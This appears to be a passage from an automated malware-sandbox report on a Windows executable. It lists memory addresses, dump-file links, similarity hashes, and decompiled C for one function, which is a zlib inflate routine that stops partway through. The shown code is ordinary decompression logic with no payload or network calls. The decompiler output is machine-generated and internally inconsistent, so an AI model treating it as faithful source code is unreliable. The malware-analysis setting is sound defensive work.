0x0040826e
0x00408270
0x00408271
0x00408274
0x00408275
0x00408277
0x0040827e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040827e
0x00000000
0x00408260
0x00408259
0x00000000
0x00000000
0x0040829a
0x004082ac
0x004082b7
0x004082bd
0x004082fe
0x00408300
0x004083be
0x004083c3
0x004083c6
0x004083c8
0x004083ca
0x004083d0
0x004083e2
0x004083ed
0x004083f0
0x004083f3
0x00000000
0x004083d2
0x004083d2
0x004083d6
0x00000000
0x004083d6
0x00408306
0x00408306
0x00408308
0x0040830b
0x00408312
0x0040831d
0x0040833f
0x00408347
0x00408355
0x004083b1
0x004083b1
0x004083b6
0x004083ba
0x004083bc
0x00000000
0x00408357
0x00000000
0x00408357
0x00408365
0x00408367
0x0040836b
0x0040836c
0x0040836f
0x00408371
0x00408374
0x00408388
0x00408389
0x0040839f
0x004083af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004083af
0x00000000
0x00408357
0x00408355
0x004082c0
0x00000000
0x00000000
0x004082c0
0x004082ce
0x004082d3
0x004082d4
0x004082d7
0x004082e3
0x004082e4
0x004082eb
0x004082f6
0x004082fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004082fc
0x00000000
0x004082c0
0x00000000
0x00000000
0x004083f9
0x004083f9
0x004083fe
0x00408438
0x00408446
0x00408458
0x00408458
0x00000000
0x00408448
0x00408448
0x0040844c
0x00000000
0x0040844c
0x00408400
0x00408400
0x00408402
0x00408424
0x00408424
0x00408431
0x00408434
0x00408436
0x00000000
0x00408404
0x00000000
0x00408404
0x00408412
0x00408414
0x00408415
0x00408418
0x00408419
0x0040841b
0x00408422
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408422
0x00000000
0x00408404
0x00408402
0x00000000
0x00000000
0x0040845e
0x00408463
0x00000000
0x00408469
0x00408469
0x0040846d
0x00408471
0x00408476
0x004084b4
0x004084ba
0x004084bd
0x004084c1
0x00000000
0x00408478
0x00408478
0x00408478
0x0040847a
0x0040847d
0x00408483
0x0040849a
0x0040849d
0x00408485
0x00408485
0x0040848d
0x00408491
0x00408491
0x004084a1
0x004084a5
0x004084a8
0x004084ae
0x004084b0
0x004084b0
0x004084c5
0x004084c5
0x004084c5
0x004084ae
0x004084c9
0x004084c9
0x004084cf
0x004084d1
0x004084d3
0x004084d3
0x004084d9
0x004084e3
0x004084e7
0x004084f0
0x004084f0
0x004084f6
0x004084fa
0x004084fc
0x004084fd
0x004084fd
0x004084fd
0x00408508
0x0040850c
0x00408512
0x00408512
0x00000000
0x0040850c
0x00000000
0x00000000
0x0040851d
0x00408522
0x00000000
0x00408528
0x00408528
0x00408528
0x0040852c
0x0040852f
0x00408531
0x00408532
0x00408536
0x0040853a
0x00000000
0x0040853a
0x00000000
0x00000000
0x00408545
0x00408549
0x00408606
0x00408606
0x00000000
0x0040854f
0x0040854f
0x00408552
0x00408574
0x00408574
0x00408578
0x0040857c
0x00408580
0x00408583
0x00408586
0x0040858c
0x0040858e
0x00408592
0x00408595
0x0040859c
0x0040859d
0x0040859e
0x004085a7
0x004085a0
0x004085a0
0x004085a0
0x004085ac
0x004085b0
0x004085b4
0x004085b7
0x004085ba
0x004085ba
0x004085c1
0x004085c5
0x004085c9
0x004085cb
0x004085cd
0x004085d4
0x004085d7
0x004085db
0x004085de
0x004085e4
0x004085e7
0x004085eb
0x004085ee
0x004085ee
0x004085f3
0x00408602
0x00408602
0x00408604
0x00000000
0x004085f5
0x004085f5
0x004085f5
0x004085f9
0x00000000
0x004085f9
0x00408554
0x00000000
0x00408554
0x0040855c
0x00408560
0x00408562
0x00408564
0x00408565
0x00408568
0x00408569
0x0040856b
0x00408572
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408572
0x00000000
0x00408554
0x00408552
0x00000000
0x00000000
0x0040860c
0x00408610
0x004086a1
0x004086a1
0x00000000
0x00408620
0x00408620
0x00408623
0x00408645
0x00408648
0x0040869d
0x0040869d
0x0040869f
0x00000000
0x00000000
0x00000000
0x00000000
0x00408625
0x00000000
0x00408625
0x0040862d
0x00408631
0x00408633
0x00408635
0x00408636
0x00408639
0x0040863a
0x0040863c
0x00408643
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408643
0x00000000
0x00408625
0x00408623
0x00000000
0x00000000
0x004086a7
0x004086a7
0x00000000
0x00000000
0x004086b1
0x004086b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00407420
0x00408666
0x00408666
0x00000000
0x00408666
0x00407ff6
0x00407d92
0x00407d92
0x00407d92
0x00407da2
0x00407dad
0x00407db3
0x00407df3
0x00407dfb
0x00407e52
0x00407e52
0x00407e5b
0x00407ec5
0x00407ec9
0x00407ecc
0x00407ed0
0x00407f1e
0x00407f23
0x00407f4b
0x00407f4b
0x00407f55
0x00407f59
0x00407f5c
0x00000000
0x00407f25
0x00000000
0x00407f25
0x00407f33
0x00407f35
0x00407f39
0x00407f3a
0x00407f3d
0x00407f42
0x00407f43
0x00407f49
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f49
0x00000000
0x00407f25
0x00407ed2
0x00407ed2
0x00407ed7
0x00407f06
0x00407f06
0x00407f10
0x00407f14
0x00407f17
0x00407f61
0x00407f63
0x00407f65
0x00407f69
0x00000000
0x00407ee0
0x00000000
0x00000000
0x00407ee0
0x00407eee
0x00407ef0
0x00407ef4
0x00407ef5
0x00407ef8
0x00407efd
0x00407efe
0x00407f04
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f04
0x00000000
0x00407ee0
0x00407ed7
0x00407e5d
0x00407e5d
0x00407e5d
0x00407e63
0x00407e69
0x00407e96
0x00407e96
0x00407e99
0x00407e9b
0x00407e9f
0x00000000
0x00407ea5
0x00407ea5
0x00407eaf
0x00407eb2
0x00407eb5
0x00407eb9
0x00407ebd
0x00407f71
0x00407f7e
0x00000000
0x00407f84
0x00407f84
0x00407f89
0x00407f8b
0x00407f8b
0x00407f90
0x00407f90
0x00407f93
0x00407f97
0x00407f9c
0x00407f9f
0x00407f90
0x00000000
0x00407f89
0x00407f7e
0x00407e6b
0x00407e6b
0x00000000
0x00407e70
0x00407e7e
0x00407e80
0x00407e84
0x00407e85
0x00407e88
0x00407e8d
0x00407e8e
0x00407e94
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e94
0x00000000
0x00407e70
0x00407e69
0x00407dfd
0x00407dfd
0x00407e07
0x00407e36
0x00407e36
0x00407e3c
0x00407e3e
0x00407e45
0x00407e4a
0x00000000
0x00407e10
0x00000000
0x00000000
0x00407e10
0x00407e1e
0x00407e20
0x00407e21
0x00407e24
0x00407e25
0x00407e27
0x00407e2e
0x00407e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e34
0x00000000
0x00407e10
0x00407e07
0x00407db5
0x00000000
0x00407db5
0x00407dc3
0x00407dc8
0x00407dc9
0x00407dcc
0x00407dd8
0x00407dd9
0x00407de0
0x00407deb
0x00407df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407df1
0x00000000
0x00407db5
0x00000000
0x00407fa6
0x00407fac
0x00000000
0x00407d92
0x00407d8c
0x00407cc0
0x00000000
0x00407cc0
0x00407cc0
0x00407cc3
0x00000000
0x00407cc5
0x00000000
0x00407cc5
0x00407cd3
0x00407cd5
0x00407cd6
0x00407cd9
0x00407cda
0x00407cdc
0x00407ce3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ce3
0x00000000
0x00407cc5
0x00000000
0x00407ce5
0x00407cf5
0x00407cfa
0x00407d00
0x00407d03
0x00407d06
0x00000000
0x00407cc0
0x00407cbb
0x00000000
0x00407c99

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004073A0, Relevance: .6, Instructions: 633
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E004073A0() {
				signed char** _t638;
				signed int _t640;
				signed int _t641;
				unsigned int _t667;
				signed char* _t680;
				signed char* _t696;
				signed int* _t714;
				signed int _t716;
				signed char* _t723;
				void* _t730;

				_t638 =  *(_t730 + 4);
				if(_t638 == 0) {
					L330:
					return 0xfffffffe;
				} else {
					_t714 = _t638[7];
					if(_t714 == 0 || _t638[3] == 0 ||  *_t638 == 0 && _t638[1] != 0) {
						goto L330;
					} else {
						if( *_t714 == 0xb) {
							 *_t714 = 0xc;
						}
						_t696 = _t638[1];
						_t667 = _t714[0xe];
						_t723 =  *_t638;
						 *(_t730 + 0x20) = _t638[3];
						_t680 = _t638[4];
						_t640 =  *_t714;
						_t716 = _t714[0xf];
						 *(_t730 + 0x18) = _t680;
						 *(_t730 + 0x10) = _t696;
						 *(_t730 + 0x38) = _t696;
						 *(_t730 + 0x28) = _t680;
						 *(_t730 + 0x30) = 0;
						if(_t640 > 0x1c) {
							L305:
							_t641 = 0xfffffffe;
							goto L306;
						} else {
							do {
								switch( *((intOrPtr*)(_t640 * 4 +  &M004087C4))) {
									case 0:
										if(_t714[2] != 0) {
											if(_t716 >= 0x10) {
												L16:
												if((_t714[2] & 0x00000002) == 0 || _t667 != 0x8b1f) {
													_t642 = _t714[8];
													_t714[4] = 0;
													if(_t642 != 0) {
														 *((intOrPtr*)(_t642 + 0x30)) = 0xffffffff;
													}
													if((_t714[2] & 0x00000001) == 0 || (((_t667 & 0x000000ff) << 8) + (_t667 >> 8)) % 0x1f != 0) {
														( *(_t730 + 0x40))[6] = 0x41d338;
														goto L303;
													} else {
														if((_t667 & 0x0000000f) == 8) {
															_t667 = _t667 >> 4;
															_t693 = (_t667 & 0x0000000f) + 8;
															_t716 = _t716 - 4;
															if(_t693 <= _t714[9]) {
																_push(0);
																_push(0);
																_push(0);
																_t714[5] = 1 << _t693;
																_t647 = E004024A0();
																_t705 =  *(_t730 + 0x1c);
																_t714[6] = _t647;
																 *( *((intOrPtr*)(_t730 + 0x4c)) + 0x30) = _t647;
																 *_t714 =  !(_t667 >> 8) & 0x00000002 | 0x00000009;
																_t730 = _t730 + 0xc;
																_t667 = 0;
																_t716 = 0;
															} else {
																_t705 =  *(_t730 + 0x10);
																goto L302;
															}
														} else {
															_t705 =  *(_t730 + 0x10);
															( *(_t730 + 0x40))[6] = 0x41d338;
															goto L303;
														}
													}
												} else {
													_t714[6] = E00403080(0, 0, 0);
													 *((char*)(_t730 + 0x2c)) = 0x1f;
													 *((char*)(_t730 + 0x2d)) = 0x8b;
													_t650 = E00403080(_t714[6], _t730 + 0x2c, 2);
													_t705 =  *(_t730 + 0x28);
													_t730 = _t730 + 0x18;
													_t667 = 0;
													_t714[6] = _t650;
													_t716 = 0;
													 *_t714 = 1;
												}
												goto L304;
											} else {
												while(_t705 != 0) {
													_t665 = ( *_t723 & 0x000000ff) << _t716;
													_t705 = _t705 - 1;
													_t716 = _t716 + 8;
													_t723 =  &(_t723[1]);
													_t667 = _t667 + _t665;
													 *(_t730 + 0x10) = _t705;
													if(_t716 < 0x10) {
														continue;
													} else {
														goto L16;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											 *_t714 = 0xc;
											goto L304;
										}
										goto L331;
									case 1:
										if(__esi >= 0x10) {
											L32:
											 *(__edi + 0x10) = __ebx;
											if(__bl != 8) {
												goto L302;
											} else {
												if((__ebx & 0x0000e000) == 0) {
													__eax =  *(__edi + 0x20);
													if(__eax != 0) {
														__ebx = __ebx >> 8;
														__ecx = __ebx >> 0x00000008 & 0x00000001;
														 *__eax = __ebx >> 0x00000008 & 0x00000001;
													}
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __bl;
														__ebx = __ebx >> 8;
														__edx = __esp + 0x20;
														 *(__esp + 0x21) = __bl;
														__eax =  *(__edi + 0x18);
														__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
														__edx =  *(__esp + 0x1c);
														 *(__edi + 0x18) = __eax;
													}
													__ebx = 0;
													__esi = 0;
													 *__edi = 2;
													goto L42;
												} else {
													goto L34;
												}
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L32;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 2:
										if(__esi >= 0x20) {
											L44:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 4) = __ebx;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ecx = __ebx;
												__edx = __ebx;
												__ecx = __ebx >> 8;
												__edx = __ebx >> 0x10;
												__ebx = __ebx >> 0x18;
												__eax = __esp + 0x20;
												 *(__esp + 0x21) = __cl;
												 *((char*)(__esp + 0x22)) = __dl;
												 *(__esp + 0x23) = __bl;
												__ecx =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 3;
											goto L51;
										} else {
											L42:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L44;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 3:
										if(__esi >= 0x10) {
											L53:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												__ebx = __ebx & 0x000000ff;
												 *(__eax + 8) = __ebx & 0x000000ff;
												__ecx =  *(__edi + 0x20);
												__eax = __ebx;
												__eax = __ebx >> 8;
												 *( *(__edi + 0x20) + 0xc) = __eax;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ebx = __ebx >> 8;
												__edx = __esp + 0x20;
												 *(__esp + 0x21) = __bl;
												__eax =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 4;
											goto L58;
										} else {
											L51:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L53;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 4:
										L58:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L69;
										} else {
											if(__esi >= 0x10) {
												L62:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __ebx;
												if(__eax != 0) {
													 *(__eax + 0x14) = __ebx;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __bl;
													__ebx = __ebx >> 8;
													__ecx = __esp + 0x20;
													 *(__esp + 0x21) = __bl;
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__ebx = 0;
												__esi = 0;
												L69:
												 *__edi = 5;
												goto L70;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L62;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 5:
										L70:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L83:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L84;
										} else {
											__eax =  *(__edi + 0x40);
											 *(__esp + 0x14) = __eax;
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											if(__eax != 0) {
												__ecx =  *(__edi + 0x20);
												if(__ecx != 0) {
													__ecx =  *(__ecx + 0x10);
													 *(__esp + 0x34) = __ecx;
													if(__ecx != 0) {
														 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
														__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edi + 0x20);
														__edx =  *( *(__edi + 0x20) + 0x18);
														 *(__esp + 0x20) = __ecx;
														if(__ecx > __edx) {
															__eax = __edx;
														}
														__edx =  *(__esp + 0x34);
														__eax =  *(__esp + 0x24);
														__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
														__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
														__eax =  *(__esp + 0x20);
														__edx =  *(__esp + 0x1c);
													}
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x20);
												}
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												 *(__esp + 0x10) = __edx;
											}
											if( *(__edi + 0x40) != 0) {
												goto L312;
											} else {
												goto L83;
											}
										}
										goto L331;
									case 6:
										L84:
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L99;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x1c);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L99:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L100;
												}
											}
										}
										goto L331;
									case 7:
										L100:
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L115;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x24);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L115:
													 *__edi = 8;
													goto L116;
												}
											}
										}
										goto L331;
									case 8:
										L116:
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L123:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__edx =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											__eax = E00403080(0, 0, 0);
											__ecx =  *(__esp + 0x4c);
											__edx =  *(__esp + 0x1c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											 *__edi = 0xb;
											goto L304;
										} else {
											if(__esi >= 0x10) {
												L120:
												__ecx =  *(__edi + 0x18) & 0x0000ffff;
												if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
													__ebx = 0;
													__esi = 0;
													goto L123;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L120;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 9:
										if(__esi >= 0x20) {
											L130:
											__ebx = __ebx & 0x0000ff00;
											__ebx = __ebx << 0x10;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
											__ebx = __ebx >> 8;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
											__eax = __ebx >> 0x00000008 & 0x0000ff00;
											__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
											__eax = __ecx + __ebx;
											__ecx =  *(__esp + 0x40);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x40) + 0x30) = __eax;
											__ebx = 0;
											__esi = 0;
											 *__edi = 0xa;
											goto L131;
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L130;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xa:
										L131:
										if( *((intOrPtr*)(__edi + 0xc)) == 0) {
											__eax =  *(__esp + 0x40);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x18);
											 *__eax = __ebp;
											 *(__eax + 0x10) =  *(__esp + 0x18);
											 *(__eax + 4) = __edx;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											 *(__edi + 0x38) = __ebx;
											_pop(__ebx);
											__eax = 2;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E004024A0();
											__edx =  *(__esp + 0x4c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											__edx =  *(__esp + 0x1c);
											__esp = __esp + 0xc;
											 *__edi = 0xb;
											goto L133;
										}
										goto L331;
									case 0xb:
										L133:
										if( *((intOrPtr*)(__esp + 0x44)) == 5) {
											goto L312;
										} else {
											goto L134;
										}
										goto L331;
									case 0xc:
										L134:
										if( *(__edi + 4) == 0) {
											if(__esi >= 3) {
												L140:
												__ecx = __ebx;
												__ebx = __ebx >> 1;
												__eax = __ebx;
												__ecx = __ecx & 0x00000001;
												__eax = __ebx & 0x00000003;
												__esi = __esi - 1;
												 *(__edi + 4) = __ecx;
												if(__eax > 3) {
													L146:
													__ebx = __ebx >> 2;
													__esi = __esi - 2;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
														case 0:
															__ebx = __ebx >> 2;
															 *__edi = 0xd;
															__esi = __esi - 2;
															goto L304;
														case 1:
															__eax = __edi;
															__eax = E00407290(__edi);
															__ebx = __ebx >> 2;
															 *__edi = 0x12;
															__esi = __esi - 2;
															goto L304;
														case 2:
															__ebx = __ebx >> 2;
															 *__edi = 0xf;
															__esi = __esi - 2;
															goto L304;
														case 3:
															__eax =  *(__esp + 0x40);
															 *(__eax + 0x18) = 0x41d338;
															 *__edi = 0x1b;
															goto L146;
													}
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 3) {
														continue;
													} else {
														goto L140;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__esi = __esi & 0x00000007;
											__ebx = __ebx >> __cl;
											__esi = __esi - (__esi & 0x00000007);
											 *__edi = 0x18;
											goto L304;
										}
										goto L331;
									case 0xd:
										__esi = __esi & 0x00000007;
										__esi = __esi - (__esi & 0x00000007);
										__ebx = __ebx >> __cl;
										if(__esi >= 0x20) {
											L150:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx =  !__ebx;
											__eax = __ebx & 0x0000ffff;
											__ecx =  !__ebx >> 0x10;
											if(__eax ==  !__ebx >> 0x10) {
												__ebx = 0;
												 *(__edi + 0x40) = __eax;
												__esi = 0;
												 *__edi = 0xe;
												goto L153;
											} else {
												__eax =  *(__esp + 0x40);
												 *(__eax + 0x18) = 0x41d338;
												goto L303;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L150;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xe:
										L153:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x14) = __eax;
										if(__eax == 0) {
											goto L233;
										} else {
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											__ecx =  *(__esp + 0x18);
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x14) = __eax;
											}
											if(__eax == 0) {
												goto L312;
											} else {
												__ecx =  *(__esp + 0x14);
												__edx =  *(__esp + 0x24);
												__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
												__eax =  *(__esp + 0x20);
												 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
												 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
												__edx =  *(__esp + 0x1c);
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												goto L304;
											}
										}
										goto L331;
									case 0xf:
										if(__esi >= 0xe) {
											L163:
											__ecx = __ebx;
											__ecx = __ebx & 0x0000001f;
											__ebx = __ebx >> 5;
